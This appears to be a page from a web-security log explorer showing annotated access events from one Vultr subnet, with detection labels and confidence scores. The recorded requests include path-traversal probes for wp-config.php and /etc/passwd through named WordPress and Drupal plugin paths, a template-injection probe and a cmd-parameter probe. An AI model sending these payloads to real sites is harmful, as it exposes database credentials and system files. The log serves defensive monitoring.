More (full fields + snapshot) expand

url

/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=../../../../../../../wp-config.php

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36

summary

Path traversal / LFI indicator detected

details

subnet

95.179.133.0/24

asn

20473 — The Constant Company, LLC

geo

The Netherlands, North Holland, Amsterdam

org

Vultr Holdings LLC Amsterdam

#36 2023-10-16 20:45:01 event 233571 GET 403 bytes 555

ann trav 28 label trav

Request Path traversal / LFI indicator detected

/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=../../../../../../../wp-config.php

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36

Annotation facts

label

trav

rule

trav:dotdot_slash

conf

92.00

details

More (full fields + snapshot) expand

url

/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=../../../../../../../wp-config.php

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36

summary

Path traversal / LFI indicator detected

details

subnet

95.179.133.0/24

asn

20473 — The Constant Company, LLC

geo

The Netherlands, North Holland, Amsterdam

org

Vultr Holdings LLC Amsterdam

#37 2023-10-16 20:45:01 event 233571 GET 403 bytes 555

ann trav 34 label trav

Request Path traversal / LFI indicator detected

/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=../../../../../../../wp-config.php

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36

Annotation facts

label

trav

rule

trav:sensitive_target

conf

95.00

details

More (full fields + snapshot) expand

url

/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=../../../../../../../wp-config.php

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36

summary

Path traversal / LFI indicator detected

details

subnet

95.179.133.0/24

asn

20473 — The Constant Company, LLC

geo

The Netherlands, North Holland, Amsterdam

org

Vultr Holdings LLC Amsterdam

#38 2023-10-16 20:45:01 event 233571 GET 403 bytes 555

ann sfp 34 label sensitive_file

Request Directory traversal indicator

/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=../../../../../../../wp-config.php

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36

Annotation facts

label

sensitive_file

rule

sfp:traversal

conf

86.00

details

Traversal sequences were present (raw or encoded). Snippet='s/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=../../../../../../../wp-config.php'

More (full fields + snapshot) expand

url

/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=../../../../../../../wp-config.php

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36

summary

Directory traversal indicator

details

Traversal sequences were present (raw or encoded). Snippet='s/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=../../../../../../../wp-config.php'

subnet

95.179.133.0/24

asn

20473 — The Constant Company, LLC

geo

The Netherlands, North Holland, Amsterdam

org

Vultr Holdings LLC Amsterdam

#39 2023-10-16 20:45:01 event 233571 GET 403 bytes 555

ann sfp 36 label sensitive_file

Request Probe for CMS/app configuration file

/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=../../../../../../../wp-config.php

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36

Annotation facts

label

sensitive_file

rule

sfp:file:app_config

conf

88.00

details

Request targeted a common CMS/app configuration file. Snippet='es/ajax_shortcode_pattern.php?ajax_path=../../../../../../../wp-config.php'

More (full fields + snapshot) expand

url

/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=../../../../../../../wp-config.php

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36

summary

Probe for CMS/app configuration file

details

Request targeted a common CMS/app configuration file. Snippet='es/ajax_shortcode_pattern.php?ajax_path=../../../../../../../wp-config.php'

subnet

95.179.133.0/24

asn

20473 — The Constant Company, LLC

geo

The Netherlands, North Holland, Amsterdam

org

Vultr Holdings LLC Amsterdam

#40 2023-10-16 20:45:01 event 233571 GET 403 bytes 555

ann base label observed

Request event observed

/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=../../../../../../../wp-config.php

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=../../../../../../../wp-config.php

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36

summary

event observed

details

—

subnet

95.179.133.0/24

asn

20473 — The Constant Company, LLC

geo

The Netherlands, North Holland, Amsterdam

org

Vultr Holdings LLC Amsterdam

#41 2023-10-16 20:43:38 event 233570 POST 404 bytes 6301

ann base label observed

Request event observed

/CMSPages/Staging/SyncServer.asmx/ProcessSynchronizationTaskData

referer

Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/CMSPages/Staging/SyncServer.asmx/ProcessSynchronizationTaskData

referer

Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36

summary

event observed

details

—

subnet

95.179.133.0/24

asn

20473 — The Constant Company, LLC

geo

The Netherlands, North Holland, Amsterdam

org

Vultr Holdings LLC Amsterdam

#42 2023-10-16 20:42:19 event 233567 GET 200 bytes 8534

ann base label observed

Request event observed

/?id=brcr3S%25{128*128}

referer

Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/?id=brcr3S%25{128*128}

referer

Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

summary

event observed

details

—

subnet

95.179.133.0/24

asn

20473 — The Constant Company, LLC

geo

The Netherlands, North Holland, Amsterdam

org

Vultr Holdings LLC Amsterdam

#43 2023-10-16 20:41:30 event 233565 GET 404 bytes 6301

ann sfp 36 label sensitive_file

Request Command-style parameter observed

/device.rsp?opt=user&cmd=list

referer

Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36

Annotation facts

label

sensitive_file

rule

sfp:param:cmd

conf

86.00

details

A command-execution style query parameter was present (cmd/exec/command/shell). Snippet='/device.rsp?opt=user&cmd=list'

More (full fields + snapshot) expand

url

/device.rsp?opt=user&cmd=list

referer

Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36

summary

Command-style parameter observed

details

A command-execution style query parameter was present (cmd/exec/command/shell). Snippet='/device.rsp?opt=user&cmd=list'

subnet

95.179.133.0/24

asn

20473 — The Constant Company, LLC

geo

The Netherlands, North Holland, Amsterdam

org

Vultr Holdings LLC Amsterdam

#44 2023-10-16 20:41:30 event 233565 GET 404 bytes 6301

ann base label observed

Request event observed

/device.rsp?opt=user&cmd=list

referer

Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/device.rsp?opt=user&cmd=list

referer

Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36

summary

event observed

details

—

subnet

95.179.133.0/24

asn

20473 — The Constant Company, LLC

geo

The Netherlands, North Holland, Amsterdam

org

Vultr Holdings LLC Amsterdam

#45 2023-10-16 20:37:45 event 233560 GET 404 bytes 6301

ann base label observed

Request event observed

/user/scripts/login_par.js

referer

Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/user/scripts/login_par.js

referer

Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36

summary

event observed

details

—

subnet

95.179.133.0/24

asn

20473 — The Constant Company, LLC

geo

The Netherlands, North Holland, Amsterdam

org

Vultr Holdings LLC Amsterdam

#46 2023-10-16 20:37:32 event 233556 GET 404 bytes 6301

ann trav 26 label trav

Request Path traversal / LFI indicator detected

/sites/all/modules/avatar_uploader/lib/demo/view.php?file=../../../../../../../../../../../etc/passwd

referer

Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36

Annotation facts

label

trav

rule

trav:mixed_separators

conf

90.00

details

More (full fields + snapshot) expand

url

/sites/all/modules/avatar_uploader/lib/demo/view.php?file=../../../../../../../../../../../etc/passwd

referer

Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36

summary

Path traversal / LFI indicator detected

details

subnet

95.179.133.0/24

asn

20473 — The Constant Company, LLC

geo

The Netherlands, North Holland, Amsterdam

org

Vultr Holdings LLC Amsterdam

#47 2023-10-16 20:37:32 event 233556 GET 404 bytes 6301

ann trav 28 label trav

Request Path traversal / LFI indicator detected

/sites/all/modules/avatar_uploader/lib/demo/view.php?file=../../../../../../../../../../../etc/passwd

referer

Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36

Annotation facts

label

trav

rule

trav:dotdot_slash

conf

92.00

details

More (full fields + snapshot) expand

url

/sites/all/modules/avatar_uploader/lib/demo/view.php?file=../../../../../../../../../../../etc/passwd

referer

Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36

summary

Path traversal / LFI indicator detected

details

subnet

95.179.133.0/24

asn

20473 — The Constant Company, LLC

geo

The Netherlands, North Holland, Amsterdam

org

Vultr Holdings LLC Amsterdam

#48 2023-10-16 20:37:32 event 233556 GET 404 bytes 6301

ann sfp 8 label sensitive_file

Request File/path-style parameter observed (weak hint)

/sites/all/modules/avatar_uploader/lib/demo/view.php?file=../../../../../../../../../../../etc/passwd

referer

Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36

Annotation facts

label

sensitive_file

rule

sfp:param:file_path_hint

conf

60.00

details

A file/path/download-style parameter was present; treated as a weak correlating hint. Snippet='file/path/download param present'

More (full fields + snapshot) expand

url

/sites/all/modules/avatar_uploader/lib/demo/view.php?file=../../../../../../../../../../../etc/passwd

referer

Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36

summary

File/path-style parameter observed (weak hint)

details

A file/path/download-style parameter was present; treated as a weak correlating hint. Snippet='file/path/download param present'

subnet

95.179.133.0/24

asn

20473 — The Constant Company, LLC

geo

The Netherlands, North Holland, Amsterdam

org

Vultr Holdings LLC Amsterdam

#49 2023-10-16 20:37:32 event 233556 GET 404 bytes 6301

ann sfp 34 label sensitive_file

Request Directory traversal indicator

/sites/all/modules/avatar_uploader/lib/demo/view.php?file=../../../../../../../../../../../etc/passwd

referer

Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36

Annotation facts

label

sensitive_file

rule

sfp:traversal

conf

86.00

details

Traversal sequences were present (raw or encoded). Snippet='/sites/all/modules/avatar_uploader/lib/demo/view.php?file=../../../../../../../../../../../etc/passwd'

More (full fields + snapshot) expand

url

/sites/all/modules/avatar_uploader/lib/demo/view.php?file=../../../../../../../../../../../etc/passwd

referer

Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36

summary

Directory traversal indicator

details

Traversal sequences were present (raw or encoded). Snippet='/sites/all/modules/avatar_uploader/lib/demo/view.php?file=../../../../../../../../../../../etc/passwd'

subnet

95.179.133.0/24

asn

20473 — The Constant Company, LLC

geo

The Netherlands, North Holland, Amsterdam

org

Vultr Holdings LLC Amsterdam

#50 2023-10-16 20:37:32 event 233556 GET 404 bytes 6301

ann sfp 44 label sensitive_file

Request Probe for OS credential/secret file

/sites/all/modules/avatar_uploader/lib/demo/view.php?file=../../../../../../../../../../../etc/passwd

referer

Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36

Annotation facts

label

sensitive_file

rule

sfp:file:os_secrets

conf

94.00

details

Request targeted OS credential/secret artifacts (e.g., /etc/passwd, shadow). Snippet='/lib/demo/view.php?file=../../../../../../../../../../../etc/passwd'

More (full fields + snapshot) expand

url

/sites/all/modules/avatar_uploader/lib/demo/view.php?file=../../../../../../../../../../../etc/passwd

referer

Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36

summary

Probe for OS credential/secret file

details

Request targeted OS credential/secret artifacts (e.g., /etc/passwd, shadow). Snippet='/lib/demo/view.php?file=../../../../../../../../../../../etc/passwd'

subnet

95.179.133.0/24

asn

20473 — The Constant Company, LLC

geo

The Netherlands, North Holland, Amsterdam

org

Vultr Holdings LLC Amsterdam

Log Explorer

Annotated access events

Confirm Action